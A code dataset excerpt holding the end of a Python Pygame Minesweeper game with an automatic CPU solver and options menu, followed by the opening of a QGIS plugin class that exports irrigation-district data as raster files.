event.dict['button'] == 2:\r\n click = pyg.Rect(event.dict['pos'], (1, 1))\r\n index_clear = click.collidelist(tiles_rect)\r\n if index_clear == -1:\r\n continue\r\n i = index_clear // size_h\r\n j = index_clear % size_w\r\n index_coords_clear = (i, j)\r\n break\r\n elif vis_helper and event.type == pyg.MOUSEMOTION:\r\n mouse = pyg.Rect(event.dict['pos'], (1, 1))\r\n hover_index = mouse.collidelist(tiles_rect)\r\n if hover_index == -1:\r\n continue\r\n h_i = hover_index // size_h\r\n h_j = hover_index % size_w\r\n draw_img()\r\n draw_cover()\r\n if tiles[h_i, h_j] not in range(1, 9) or\\\r\n tiles_cover[h_i, h_j] in [tile_mark, tile_blank_up]:\r\n continue\r\n for dx, dy in around: # Draw dot at each of coords\r\n n_i, n_j = h_i+dx, h_j+dy\r\n if n_i >= size_h or n_j >= size_w or n_i < 0 or n_j < 0:\r\n continue\r\n elif tiles_cover[n_i, n_j] not in (tile_mark,\r\n tile_blank_up):\r\n continue\r\n screen.blit(tile_dot,\r\n tiles_rect[hover_index+size_w*dx+dy])\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n screen.blit(area, (0, screen_h-70))\r\n write(screen, 'Mines Left: '+str(mines_left),\r\n text_col, None, 28, screen_w//2, 50, antialias=False)\r\n cur_time = time.time()-time_start\r\n if show_time:\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(cur_time-int(cur_time), 2))[2:].zfill(2),\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n if record_time is not None:\r\n write(screen,\r\n 'Record Time: ' + str(int(record_time)//60) + ':' +\r\n str(int(record_time) % 60).zfill(2) + '.' +\r\n str(round(record_time-int(record_time), 2))[2:].zfill(2),\r\n text_col, None, 28, 25, screen_h-50,\r\n centered=False)\r\n update()\r\n if not running:\r\n pyg.quit()\r\n return\r\n \r\n button = pyg.Surface((100, 50))\r\n button_rect = pyg.Rect(screen_w-162, screen_h//2-75, 100, 50)\r\n button.fill(btn_col)\r\n screen.blit(button, (screen_w-162, screen_h//2-75))\r\n text_x = screen_w-162+button.get_width()//2\r\n text_y = screen_h//2-75+button.get_height()//2\r\n write(screen, 'Again?', text_col, None, 28, text_x, text_y)\r\n\r\n quit_btn = pyg.Surface((75, 50))\r\n quit_btn_rect = pyg.Rect(screen_w-150, screen_h//2+100, 75, 50)\r\n quit_btn.fill(quit_col)\r\n screen.blit(quit_btn, (screen_w-150, screen_h//2+100))\r\n quit_txt_x = screen_w-150+quit_btn.get_width()//2\r\n quit_txt_y = screen_h//2+100+quit_btn.get_height()//2\r\n write(screen, 'Quit?', text_col, None, 24, quit_txt_x, quit_txt_y)\r\n\r\n option_btn = pyg.Surface((100, 50))\r\n option_btn_rect = pyg.Rect(50, screen_h//2-25, 100, 50)\r\n option_btn.fill(option_col)\r\n screen.blit(option_btn, (50, screen_h//2-25))\r\n option_txt_x = 50+option_btn.get_width()//2\r\n option_txt_y = screen_h//2-25+option_btn.get_height()//2\r\n write(screen, 'Options', text_col, None, 26, option_txt_x, option_txt_y)\r\n update()\r\n while True:\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pyg.QUIT:\r\n pyg.quit()\r\n break\r\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n pos = event.dict['pos']\r\n click = pyg.Rect(pos, (1, 1))\r\n if button_rect.colliderect(click):\r\n if record_time and end_time and end_time < record_time:\r\n record_time = end_time\r\n elif record_time is None and end_time:\r\n record_time = end_time\r\n main()\r\n break\r\n elif quit_btn_rect.colliderect(click):\r\n pyg.quit()\r\n break\r\n elif option_btn_rect.colliderect(click):\r\n options()\r\n break\r\n\r\n\r\n\"\"\"AI/CPU\"\"\"\r\n\r\n\r\ndef pick_rand_tile():\r\n global index, index_coords\r\n index = random.randint(0, size_w*size_h-1)\r\n i = index // size_h\r\n j = index % size_w\r\n index_coords = (i, j)\r\n\r\n\r\ndef mark_click(i, j):\r\n tiles_cover[i, j] = tile_cpumark\r\n\r\n\r\ndef count_covered(i, j, mark=True):\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n\r\n c = 0\r\n if mark:\r\n tiles_to_test = (tile_mark, tile_blank_up)\r\n else:\r\n tiles_to_test = (tile_blank_up,)\r\n for x, y in cycle:\r\n if y >= size_w or y < 0 or\\\r\n x >= size_h or x < 0:\r\n continue\r\n if tiles_cover[x, y] in tiles_to_test:\r\n c += 1\r\n return c\r\n\r\n\r\ndef mark_around(i, j):\r\n global mines_left\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n for x, y in cycle:\r\n if y >= size_w or y < 0 or\\\r\n x >= size_h or x < 0:\r\n continue\r\n if tiles_cover[x, y] == tile_blank_up:\r\n tiles_cover[x, y] = tile_mark\r\n\r\n mines_left = mines-list(tiles_cover.flatten()).count(tile_mark)\r\n\r\n\r\n\"\"\"Cpu Main\"\"\"\r\n\r\n\r\ndef cpu_main():\r\n global record_time, cur_time, time_start, end_time,\\\r\n index, game_over, mines_left, mine_indices, index_coords\r\n global tile_1, tile_1_rect, tile_2, tile_2_rect,\\\r\n tile_3, tile_3_rect, tile_4, tile_4_rect,\\\r\n tile_5, tile_5_rect, tile_6, tile_6_rect,\\\r\n tile_7, tile_7_rect, tile_8, tile_8_rect,\\\r\n tile_blank, tile_blank_rect, tile_mark, tile_mark_rect,\\\r\n tile_mark_through, tile_mark_through_rect,\\\r\n tile_mine, tile_mine_rect, tile_blank_up, tile_blank_up_rect,\\\r\n tile_blank_up_through, tile_blank_up_through_rect, tile_cpumark,\\\r\n tile_cpumark_rect\r\n global tiles, tiles_img, tile_img_list,\\\r\n tile_h, tile_w, tile_rect_list, tiles_cover, prev_tiles_cover\r\n global times_done, loop\r\n\r\n game_over = 0\r\n cur_time = None\r\n time_start = None\r\n end_time = 2**1000\r\n\r\n mines_left = int(mines)\r\n\r\n \"\"\"Variables/Tiles\"\"\"\r\n tiles = np.array([[0]*size_w]*size_h) # Tiles (numbers)\r\n\r\n resize_tiles()\r\n\r\n # Board tile images\r\n tiles_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n # Overlay tile images\r\n tiles_cover = np.array([[tile_blank_up]*size_w]*size_h)\r\n\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Destination of tiles\r\n dest_y = screen_h//2 - (size_h*tile_h)//2 # (Centered around middle)\r\n\r\n clear()\r\n\r\n if record_time:\r\n write(screen,\r\n 'Record Time: ' + str(int(record_time)//60) + ':' +\r\n str(int(record_time) % 60).zfill(2) + '.' +\r\n str(round(record_time-int(record_time), 2))[2:].zfill(2),\r\n text_col, None, 28, 25, screen_h-50,\r\n centered=False)\r\n\r\n \"\"\"Draw tiles\"\"\"\r\n for y in tiles_cover: # Go through the tiles vertically\r\n for x in y: # Go through each tile in the lists\r\n blitrect = screen.blit(x, (dest_x, dest_y)) # Draw tile\r\n dest_x += tile_w # Move the destination x-coord to the right\r\n dest_y += tile_h # Move the destination y-coord downwards\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Reset x-coord\r\n\r\n update() # Update screen\r\n\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n\r\n pick_rand_tile()\r\n\r\n \"\"\"Set up board\"\"\"\r\n \"\"\"No-mine locations\"\"\"\r\n no_mines = [\r\n ind_rel(-2, -2), ind_rel(-1, -2),\r\n ind_rel(+0, -2), ind_rel(+1, -2), ind_rel(+2, -2),\r\n ind_rel(-2, -1), ind_rel(-1, -1),\r\n ind_rel(+0, -1), ind_rel(+1, -1), ind_rel(+2, -1),\r\n ind_rel(-2, +0), ind_rel(-1, +0),\r\n ind_rel(+0, +0), ind_rel(+1, +0), ind_rel(+2, +0),\r\n ind_rel(-2, +1), ind_rel(-1, +1),\r\n ind_rel(+0, +1), ind_rel(+1, +1), ind_rel(+2, +1),\r\n ind_rel(-2, +2), ind_rel(-1, +2),\r\n ind_rel(+0, +2), ind_rel(+1, +2), ind_rel(+2, +2)\r\n ] # List of places where there should be no mines at first click\r\n\r\n mine_indices = [index] # Initialize mine indices\r\n while True:\r\n for i in no_mines: # Cycle through places where no mines should be\r\n if i in mine_indices: # If one of the mines is in that place,\r\n mine_indices = random.sample(\r\n range(1, size_w*size_h+1), mines\r\n ) # Randomize mine placement\r\n break # Exit inner loop\r\n else: # When there are no mines in the place where they shouldn't be,\r\n break # Exit loop\r\n\r\n for mine_index in range(len(mine_indices)): # Loop though each mine\r\n index = mine_indices[mine_index] # Record the index\r\n i = (index-1)//size_w # Get the y-coordinate of the index\r\n j = (index-1) % size_h # Get the x-coordinate of the index\r\n mine_indices[mine_index] = (i, j) # Format as ordered pair\r\n tiles[i, j] = 9 # Set the tile number to 9 (denotes mine)\r\n\r\n \"\"\"Number of mines surrounding a tile\"\"\"\r\n for x in range(size_h): # Loop though the vertical coordinates\r\n for y in range(size_w): # Loop through the horizontal coordinates\r\n if tiles[x, y] == 9: # If the tile is a mine,\r\n continue # Skip this loop\r\n\r\n tiles[x, y] = count_mines(x, y)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n tiles_img[i, j] = tile_img_list[tiles[i, j]]\r\n\r\n time_start = time.time()\r\n\r\n delaround(*index_coords)\r\n mines_left = int(mines)\r\n cycles = 0\r\n paused = False\r\n no_update = True\r\n while True:\r\n if paused:\r\n event = pyg.event.get()\r\n if event:\r\n event = event[-1]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pyg.KEYDOWN and\\\r\n event.dict['key'] in (pyg.K_p, pyg.K_SPACE):\r\n paused = not paused\r\n continue\r\n prev_tiles_cover = np.array(tiles_cover)\r\n\r\n # Optimization; reduces time spent\r\n\r\n rows_to_check = set()\r\n cols_to_check = set()\r\n\r\n for row in range(0, size_h):\r\n if list(tiles_cover[row]).count(tile_blank_up) > 0:\r\n rows_to_check = rows_to_check.union({row-1, row, row+1})\r\n\r\n transposed_tiles_cover = tiles_cover.transpose()\r\n for col in range(0, size_w):\r\n if list(transposed_tiles_cover[col]).count(tile_blank_up) > 0:\r\n cols_to_check = cols_to_check.union({col-1, col, col+1})\r\n\r\n # Goes through each uncovered tile\r\n for i in range(0, size_h):\r\n for j in range(0, size_w):\r\n if tiles_cover[i, j] not in (tile_blank_up, tile_mark):\r\n if count_covered(i, j, mark=False) == 0:\r\n continue\r\n \"\"\"Event setup\"\"\"\r\n event_list = pyg.event.get()\r\n if not event_list:\r\n event_list = [pyg.event.Event(-1)]\r\n for event in event_list:\r\n if event.type == pyg.QUIT:\r\n try:\r\n pyg.quit()\r\n except:\r\n pass\r\n elif wait > 0 and event.type == pyg.KEYDOWN and\\\r\n event.dict['key'] in (pyg.K_p, pyg.K_SPACE):\r\n paused = not paused\r\n\r\n \"\"\"Cpu Marker\"\"\"\r\n if wait > 0:\r\n tiles_cover[i, j] = tile_cpumark\r\n draw_cover()\r\n\r\n \"\"\"Count tiles around (i, j). If = tile #, mark.\"\"\"\r\n if count_covered(i, j) == tiles[i, j]:\r\n mark_around(i, j)\r\n clear_tiles(i, j)\r\n\r\n \"\"\"Special Case 1\"\"\"\r\n # testcase_1(i, j)\r\n\r\n \"\"\"Test Game Over\"\"\"\r\n tiles_cover_list = list(tiles_cover.flatten())\r\n blank_c = tiles_cover_list.count(tile_blank_up)\r\n if blank_c == 0:\r\n game_over = 2\r\n tiles_cover[i, j] = pyg.Surface((0, 0))\r\n break\r\n\r\n if wait > 0:\r\n if tiles_img[i, j] in tile_img_list[1:9]:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n pyg.time.wait(wait)\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n screen.blit(area, (0, screen_h-70))\r\n\r\n cur_time = time.time()-time_start\r\n write(screen,\r\n 'Time: '+str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(\r\n cur_time-int(cur_time), 2))[2:].zfill(2),\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n\r\n draw_mines_left()\r\n\r\n tiles_cover[i, j] = pyg.Surface((0, 0))\r\n\r\n if game_over:\r\n break\r\n if not no_update:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n same = True\r\n for row in range(0, len(tiles_cover)):\r\n for col in range(0, len(tiles_cover[0])):\r\n if tiles_cover[row, col] in (tile_blank_up, tile_mark):\r\n if tiles_cover[row, col] != prev_tiles_cover[row, col]:\r\n same = False\r\n else:\r\n if prev_tiles_cover[row, col] in\\\r\n (tile_blank_up, tile_mark):\r\n same = False\r\n if not same:\r\n break\r\n if not same:\r\n break\r\n if game_over == 2:\r\n draw_img()\r\n draw_cover()\r\n write(screen, \"Done.\", BLACK, None, 28, screen_w//2, 35)\r\n update()\r\n break\r\n elif same:\r\n draw_img()\r\n draw_cover()\r\n write(screen,\r\n \"The CPU could not solve this Minesweeper.\" +\r\n \" Guessing or advanced deduction is needed.\",\r\n BLACK, None, 28, screen_w//2, 35)\r\n update()\r\n break\r\n\r\n button = pyg.Surface((100, 50))\r\n button_rect = pyg.Rect(screen_w-162, screen_h//2-75, 100, 50)\r\n button.fill(btn_col)\r\n screen.blit(button, (screen_w-162, screen_h//2-75))\r\n text_x = screen_w-162+button.get_width()//2\r\n text_y = screen_h//2-75+button.get_height()//2\r\n write(screen, 'Again?', text_col, None, 28, text_x, text_y)\r\n\r\n quit_btn = pyg.Surface((75, 50))\r\n quit_btn_rect = pyg.Rect(screen_w-150, screen_h//2+100, 75, 50)\r\n quit_btn.fill(quit_col)\r\n screen.blit(quit_btn, (screen_w-150, screen_h//2+100))\r\n quit_txt_x = screen_w-150+quit_btn.get_width()//2\r\n quit_txt_y = screen_h//2+100+quit_btn.get_height()//2\r\n write(screen, 'Quit?', text_col, None, 24, quit_txt_x, quit_txt_y)\r\n\r\n option_btn = pyg.Surface((100, 50))\r\n option_btn_rect = pyg.Rect(50, screen_h//2-25, 100, 50)\r\n option_btn.fill(option_col)\r\n screen.blit(option_btn, (50, screen_h//2-25))\r\n option_txt_x = 50+option_btn.get_width()//2\r\n option_txt_y = screen_h//2-25+option_btn.get_height()//2\r\n write(screen, 'Options', text_col, None, 26, option_txt_x, option_txt_y)\r\n update()\r\n while True:\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n pos = event.dict['pos']\r\n click = pyg.Rect(pos, (1, 1))\r\n if button_rect.colliderect(click):\r\n if record_time and end_time and end_time < record_time:\r\n record_time = end_time\r\n elif record_time is None and end_time:\r\n record_time = end_time\r\n cpu_main()\r\n break\r\n elif quit_btn_rect.colliderect(click):\r\n pyg.quit()\r\n break\r\n elif option_btn_rect.colliderect(click):\r\n options()\r\n break\r\n elif event.type == pyg.KEYDOWN and\\\r\n event.dict['key'] in (pyg.K_r, pyg.K_RETURN):\r\n cpu_main()\r\n if loop > 0:\r\n if game_over == 2:\r\n times_done['Done'] += 1\r\n res = 'Done'\r\n elif same:\r\n times_done['Break'] += 1\r\n res = 'Break'\r\n print(res, 'Done:', times_done['Done'],\r\n 'Break:', times_done['Break'])\r\n pyg.time.wait(loop)\r\n cpu_main()\r\n\r\n\r\n\"\"\"Options Menu\"\"\"\r\n\r\n\r\ndef opt_draw_tiles_cover():\r\n global size_w, size_h, tile_w, tile_h, opt_tiles_cover_img\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n dest_y = screen_h//2 - (size_h*tile_h)//2\r\n\r\n for y in opt_tiles_cover_img:\r\n for x in y:\r\n screen.blit(x, (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n\r\n\r\ndef options():\r\n global size_w, size_h, tile_w, tile_h, mines,\\\r\n opt_tiles_cover_img, show_destroy, cpu, wait,\\\r\n mode, around, show_time\r\n\r\n def count_mines(x, y):\r\n global size_w, size_h, tiles2, around\r\n c = 0\r\n for dx, dy in around:\r\n if x+dx >= size_h or y+dy >= size_w or x+dx < 0 or y+dy < 0:\r\n continue\r\n elif tiles2[x+dx, y+dy] == 9:\r\n c += 1\r\n return c\r\n\r\n def set_mines():\r\n global size_w, size_h, tiles2, mines\r\n\r\n tiles2 = np.array([[0]*size_w]*size_h)\r\n\r\n mine_indices = random.sample(\r\n range(0, size_w*size_h), mines\r\n ) # Randomize mine placement\r\n\r\n \"\"\"Mine placement\"\"\"\r\n for mine_index in range(len(mine_indices)): # Loop though each mine\r\n index = mine_indices[mine_index] # Record the index\r\n i = (index)//(size_w) # Get the y-coordinate of the index\r\n j = (index) % size_w # Get the x-coordinate of the index\r\n mine_indices[mine_index] = (i, j) # Format as ordered pair\r\n tiles2[i, j] = 9 # Set the tile number to 9 (denotes mine)\r\n\r\n \"\"\"Number of mines surrounding a tile\"\"\"\r\n for x in range(size_h): # Loop though the vertical coordinates\r\n for y in range(size_w): # Loop through the horizontal coordinates\r\n if tiles2[x, y] == 9: # If the tile is a mine,\r\n continue # Skip this loop\r\n tiles2[x, y] = count_mines(x, y)\r\n pyg.event.pump()\r\n\r\n option = 1\r\n\r\n set_mines()\r\n\r\n # Board tile images\r\n opt_tiles_cover_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n opt_tiles_cover_img[i, j] = tile_img_list[tiles2[i, j]]\r\n\r\n d = tile_img_list[17]\r\n o = tile_img_list[0]\r\n m = tile_img_list[16]\r\n running = True\r\n while running:\r\n clear()\r\n # Board tile images\r\n opt_tiles_cover_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles2)):\r\n for j in range(len(tiles2[i])):\r\n opt_tiles_cover_img[i, j] = tile_img_list[tiles2[i, j]]\r\n\r\n # Mode explanation images\r\n mode_expl_back = np.array([[tile_img_list[0]]*5]*5)\r\n if mode == 1: # Normal\r\n mode_expl_img = np.array([[o, o, o, o, o],\r\n [o, d, d, d, o],\r\n [o, d, m, d, o],\r\n [o, d, d, d, o],\r\n [o, o, o, o, o]])\r\n elif mode == 2: # Knight's path\r\n mode_expl_img = np.array([[o, d, o, d, o],\r\n [d, o, o, o, d],\r\n [o, o, m, o, o],\r\n [d, o, o, o, d],\r\n [o, d, o, d, o]])\r\n elif mode == 3: # Orthogonal\r\n mode_expl_img = np.array([[o, o, o, o, o],\r\n [o, o, d, o, o],\r\n [o, d, m, d, o],\r\n [o, o, d, o, o],\r\n [o, o, o, o, o]])\r\n elif mode == 4: # Far orthogonal\r\n mode_expl_img = np.array([[o, o, d, o, o],\r\n [o, o, d, o, o],\r\n [d, d, m, d, d],\r\n [o, o, d, o, o],\r\n [o, o, d, o, o]])\r\n elif mode == 5: # Diagonal\r\n mode_expl_img = np.array([[o, o, o, o, o],\r\n [o, d, o, d, o],\r\n [o, o, m, o, o],\r\n [o, d, o, d, o],\r\n [o, o, o, o, o]])\r\n elif mode == 6: # Far diagonal\r\n mode_expl_img = np.array([[d, o, o, o, d],\r\n [o, d, o, d, o],\r\n [o, o, m, o, o],\r\n [o, d, o, d, o],\r\n [d, o, o, o, d]])\r\n\r\n resize_tiles()\r\n opt_draw_tiles_cover()\r\n write(screen, 'Options', text_col, None, 28, screen_w//2, 50)\r\n\r\n change_optn = pyg.Surface((150, 50))\r\n change_optn_rect = pyg.Rect(150, screen_h//2-75, 150, 50)\r\n change_optn.fill(change_optn_col)\r\n screen.blit(change_optn, (100, screen_h//2-75))\r\n text_x = 100+change_optn.get_width()//2\r\n text_y = screen_h//2-75+change_optn.get_height()//2\r\n write(screen, 'Change Option:', text_col, None, 26, text_x, text_y-50)\r\n\r\n again_optn = pyg.Surface((150, 50))\r\n again_optn_rect = pyg.Rect(150, screen_h//2+75, 150, 50)\r\n again_optn.fill(btn_col)\r\n screen.blit(again_optn, (100, screen_h//2+75))\r\n again_text_x = 100+again_optn.get_width()//2\r\n again_text_y = screen_h//2+75+again_optn.get_height()//2\r\n write(screen, 'Back', text_col, None, 26, again_text_x, again_text_y)\r\n\r\n up = pyg.Surface((25, 25))\r\n up_rect = pyg.Rect(screen_w-150, screen_h//2-38, 25, 25)\r\n up.fill(up_col)\r\n screen.blit(up, (screen_w-150, screen_h//2-38))\r\n up_text_x = screen_w-150+up.get_width()//2\r\n up_text_y = screen_h//2-38+up.get_height()//2\r\n write(screen, '+', text_col, None, 20, up_text_x, up_text_y)\r\n\r\n down = pyg.Surface((25, 25))\r\n down_rect = pyg.Rect(screen_w-150, screen_h//2+38, 25, 25)\r\n down.fill(up_col)\r\n screen.blit(down, (screen_w-150, screen_h//2+38))\r\n down_text_x = screen_w-150+down.get_width()//2\r\n down_text_y = screen_h//2+38+down.get_height()//2\r\n write(screen, '-', text_col, None, 20, down_text_x, down_text_y)\r\n\r\n if option == 1:\r\n write(screen, 'Grid width', text_col, None, 26, text_x, text_y)\r\n write(screen, str(size_w),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 2:\r\n write(screen, 'Grid height', text_col, None, 26, text_x, text_y)\r\n write(screen, str(size_h),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 3:\r\n write(screen, 'Mine number', text_col, None, 26, text_x, text_y)\r\n write(screen, str(mines),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 4:\r\n write(screen, 'Show destroy', text_col, None, 26, text_x, text_y)\r\n write(screen, str(show_destroy),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 5:\r\n write(screen, 'CPU', text_col, None, 26, text_x, text_y)\r\n write(screen, str(cpu),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif cpu and option == 6:\r\n write(screen, 'Wait', text_col, None, 26, text_x, text_y)\r\n write(screen, str(wait),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n elif option == 7:\r\n write(screen, 'Mode', text_col, None, 26, text_x, text_y)\r\n write(screen, modes_str[mode],\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n\r\n # Draw mode explanation picture\r\n dest_x = screen_w-140-2.5*tile_w\r\n dest_y = screen_h//2-150-2.5*tile_h\r\n for i in range(5):\r\n for j in range(5):\r\n screen.blit(mode_expl_back[j, i], (dest_x, dest_y))\r\n screen.blit(mode_expl_img[j, i], (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w-140-2.5*tile_w\r\n elif option == 8:\r\n write(screen, 'Show Time', text_col, None, 26, text_x, text_y)\r\n write(screen, str(show_time),\r\n text_col, None, 28, screen_w-140, screen_h//2+10)\r\n else:\r\n option = 1\r\n\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n\r\n if event.type == pyg.QUIT:\r\n running = False\r\n break\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n pos = event.dict['pos']\r\n click = pyg.Rect(pos, (1, 1))\r\n if change_optn_rect.colliderect(click):\r\n option += 1\r\n if not cpu and option == 6: # Skip wait option if cpu enabled\r\n option = 7\r\n elif option == 9: # Loop around\r\n option = 1\r\n elif up_rect.colliderect(click):\r\n if option == 1: # Width\r\n if (size_w+1)*size_h > mines-25:\r\n size_w += 1\r\n set_mines()\r\n elif option == 2: # Height\r\n if size_w*(size_h+1) > mines-25:\r\n size_h += 1\r\n set_mines()\r\n elif option == 3: # Mines\r\n if size_w*size_h > mines-24:\r\n mines += 1\r\n set_mines()\r\n elif option == 4: # Show Destroy\r\n show_destroy = not show_destroy\r\n elif option == 5: # CPU\r\n cpu = not cpu\r\n elif cpu and option == 6: # Wait\r\n wait += 1\r\n elif option == 7: # Mode\r\n mode += 1\r\n if mode > max(modes_str):\r\n mode = 1\r\n elif option == 8:\r\n show_time = not show_time\r\n elif down_rect.colliderect(click):\r\n if option == 1:\r\n if size_w-1 > 0 and (size_w-1)*size_h > mines+25:\r\n size_w -= 1\r\n set_mines()\r\n elif option == 2:\r\n if size_h-1 > 0 and size_w*(size_h-1) > mines+25:\r\n size_h -= 1\r\n set_mines()\r\n elif option == 3:\r\n if mines-1 > 0 and size_w*size_h > mines+24:\r\n mines -= 1\r\n set_mines()\r\n elif option == 4:\r\n show_destroy = not show_destroy\r\n elif option == 5:\r\n cpu = not cpu\r\n elif cpu and option == 6:\r\n if wait > 0:\r\n wait -= 1\r\n elif option == 7:\r\n mode -= 1\r\n if mode < 1:\r\n mode = max(modes_str)\r\n elif option == 8:\r\n show_time = not show_time\r\n elif again_optn_rect.colliderect(click):\r\n if cpu:\r\n cpu_main()\r\n elif not cpu:\r\n main()\r\n return\r\n\r\n keys_pressed = pyg.key.get_pressed()\r\n if keys_pressed[pyg.K_UP]:\r\n if option == 1:\r\n if (size_w+1)*size_h > mines+25:\r\n size_w += 1\r\n set_mines()\r\n elif option == 2:\r\n if size_w*(size_h+1) > mines+25:\r\n size_h += 1\r\n set_mines()\r\n elif option == 3:\r\n if size_w*size_h > mines+26:\r\n mines += 1\r\n set_mines()\r\n elif option == 4:\r\n show_destroy = not show_destroy\r\n elif option == 5:\r\n cpu = not cpu\r\n elif option == 6:\r\n wait += 1\r\n elif option == 7:\r\n mode += 1\r\n if mode > max(modes_str):\r\n mode = 1\r\n set_mode()\r\n elif option == 8:\r\n show_time = not show_time\r\n elif keys_pressed[pyg.K_DOWN]:\r\n if option == 1:\r\n if size_w-1 > 0 and (size_w-1)*size_h > mines+25:\r\n size_w -= 1\r\n set_mines()\r\n elif option == 2:\r\n if size_h-1 > 0 and size_w*(size_h-1) > mines+25:\r\n size_h -= 1\r\n set_mines()\r\n elif option == 3:\r\n if mines-1 > 0 and size_w*size_h > mines+24:\r\n mines -= 1\r\n set_mines()\r\n elif option == 4:\r\n show_destroy = not show_destroy\r\n elif option == 5:\r\n cpu = not cpu\r\n elif option == 6:\r\n if wait > 0:\r\n wait -= 1\r\n elif option == 7:\r\n mode -= 1\r\n if mode < 1:\r\n mode = max(modes_str)\r\n set_mode()\r\n elif option == 8:\r\n show_time = not show_time\r\n update()\r\n if not running:\r\n pyg.quit()\r\n\r\n\r\nrecord_time = None\r\ntimes_done = {'Done': 0, 'Break': 0}\r\nloop = 0\r\nif not cpu:\r\n main()\r\nelif cpu:\r\n cpu_main()\r\n","repo_name":"Pegysus/minesweeper","sub_path":"Minesweeper.py","file_name":"Minesweeper.py","file_ext":"py","file_size_in_byte":56809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25964335733","text":"__author__ = 'Enrico A. Chiaradia'\n__date__ = '2020-12-01'\n__copyright__ = '(C) 2020 by Enrico A. Chiaradia'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport glob\nimport os\nimport numpy as np\nfrom PyQt5.QtCore import QObject\nfrom qgis import processing\n\nfrom .compact_dataset import save2idragra\nfrom .gis_grid import GisGrid\nfrom .utils import returnExtent\nfrom .write_pars_to_template import writeParsToTemplate\nfrom datetime import date\n\n\nclass Exporter(QObject):\n\n\tdef __init__(self, parent=None, simdic=None, feedback = None,tr=None):\n\t\tQObject.__init__(self, parent)\n\t\tself.feedback = feedback\n\t\tself.tr = tr\n\t\tself.simdic = simdic\n\t\tself.aGrid = None\n\t\tself.algResults = None # store temporary outputs\n\t\tself.algResults1 = None # store temporary outputs\n\t\tself.algResults2 = None # store temporary outputs\n\n\tdef exportGeodata(self,DBM,outPath, extent, cellSize, dtm, watertableDict, depthList,yearList,):\n\t\tyearList = [str(x) for x in yearList] # make a list of strings\n\t\t# TODO: fix output digits\n\t\t# export water district map\n\t\t# DISTRICT SOURCE\n\t\tself.feedback.pushInfo(self.tr('Exporting districts data'))\n\t\tself.feedback.setProgress(10.0)\n\t\tfileName = os.path.join(outPath, 'irr_units' + '.asc')\n\t\tlaySource = DBM.DBName+ '|layername=idr_distrmap'\n\t\tfieldName = 'id'\n\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMap\",\n\t\t\t\t\t\t\t\t {'VECTOR_LAY': laySource, 'VECTOR_FLD': fieldName,\n\t\t\t\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t\t\t\t'CELL_DIM': cellSize,\n\t\t\t\t\t\t\t\t\t'DEST_FILE': fileName},\n\t\t\t\t\t\t\t\tcontext = None, feedback = self.feedback, is_child_algorithm = False)\n\n\t\t# DISTRICT EFFICIENCY\n\t\tfileName = os.path.join(outPath, 'conv_eff' + '.asc')\n\t\tlaySource = DBM.DBName+ '|layername=idr_distrmap'\n\t\tfieldName = 'distr_eff'\n\n\t\tself.feedback.setProgress(35.0)\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMap\",\n\t\t\t\t\t\t\t\t\t{'VECTOR_LAY': laySource, 'VECTOR_FLD': fieldName,\n\t\t\t\t\t\t\t\t\t 'RASTER_EXT': extent,\n\t\t\t\t\t\t\t\t\t 'CELL_DIM': cellSize,\n\t\t\t\t\t\t\t\t\t 'DEST_FILE': fileName},\n\t\t\t\t\t\t\t\t\tcontext=None, 